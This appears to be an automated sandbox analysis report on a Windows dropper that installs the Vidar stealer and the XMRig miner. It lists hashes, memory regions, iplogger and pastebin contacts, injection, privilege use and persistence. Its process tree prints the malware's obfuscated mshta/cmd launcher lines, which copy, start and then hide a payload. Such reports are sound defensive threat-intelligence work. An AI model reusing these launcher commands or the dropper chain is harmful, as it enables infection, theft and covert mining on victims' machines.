C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O4ME655FRBIHVU8GHA65.temp

MD5 b9e77e0f9f67e51b998d217d75b67fb6
SHA1 89b32401fc5be2391a57a4770d7ddf8419de6633
SHA256 2a060ef2c0daa42d63bf58ec43e23a02deae6310298f7614944249a0da87b60b
SHA512 7e4c834afbbb5853baf3bb17c82906341aeaab205baf38d3827554e907b3cf595591e3eb793a77e69cd59983e12a9ac3a87da27306e90100fd50600668bc6f08

memory/2212-139-0x00000000012D0000-0x0000000001342000-memory.dmp

memory/596-144-0x0000000000BB0000-0x0000000000BB8000-memory.dmp

memory/3012-171-0x00000000004F0000-0x00000000004F6000-memory.dmp

memory/1876-193-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2228-194-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2396-197-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-CBB09.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\is-CBB09.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2392-142-0x0000000000A80000-0x0000000000AF0000-memory.dmp

memory/3012-140-0x0000000000B20000-0x0000000000B38000-memory.dmp

memory/2988-222-0x0000000002630000-0x0000000002820000-memory.dmp

memory/1156-223-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/1272-241-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-249-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-246-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-245-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1272-242-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1272-248-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1272-240-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1272-238-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1272-236-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1272-234-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-228-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-226-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1864-250-0x0000000064940000-0x0000000064959000-memory.dmp

memory/304-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1376-138-0x0000000000080000-0x00000000000F0000-memory.dmp

memory/2396-136-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

memory/2296-278-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-276-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-275-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-274-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2296-272-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-270-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-268-0x0000000000400000-0x0000000000422000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

memory/1864-284-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-283-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1864-282-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-281-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1864-279-0x0000000000400000-0x000000000051C000-memory.dmp

memory/1864-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1864-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-72-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1064-285-0x0000000000400000-0x0000000002F29000-memory.dmp

memory/1964-286-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/1864-71-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1864-70-0x0000000064941000-0x000000006494F000-memory.dmp

memory/1864-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC6A42827\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1864-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC6A42827\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSC6A42827\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/1864-299-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1864-298-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-297-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-296-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1864-290-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC60D.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:28

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"

Signatures

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2956 set thread context of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 4320 set thread context of 4556 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\inst2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Jonba.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cxl-game.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Jonba.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3368 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 3368 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 3368 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 3368 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\4.exe
PID 3368 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
PID 3368 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3028 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp
PID 3368 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 3368 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 3368 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
PID 2672 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3368 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
PID 3980 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2108 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp
PID 3368 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Jonba.exe
PID 4544 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 1756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
PID 4284 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1756 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe C:\Windows\SysWOW64\mshta.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe

"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"

C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe

"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"

C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe

"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"

C:\Users\Admin\AppData\Local\Temp\inst2.exe

"C:\Users\Admin\AppData\Local\Temp\inst2.exe"

C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg

C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg

C:\Users\Admin\AppData\Local\Temp\4.exe

"C:\Users\Admin\AppData\Local\Temp\4.exe"

C:\Users\Admin\AppData\Local\Temp\cxl-game.exe

"C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp" /SL5="$40252,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe

"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"

C:\Users\Admin\AppData\Local\Temp\8.exe

"C:\Users\Admin\AppData\Local\Temp\8.exe"

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )

C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp" /SL5="$C0042,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\Jonba.exe

"C:\Users\Admin\AppData\Local\Temp\Jonba.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1992 -ip 1992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 1660

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe

..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -iM "search_hyperfs_206.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

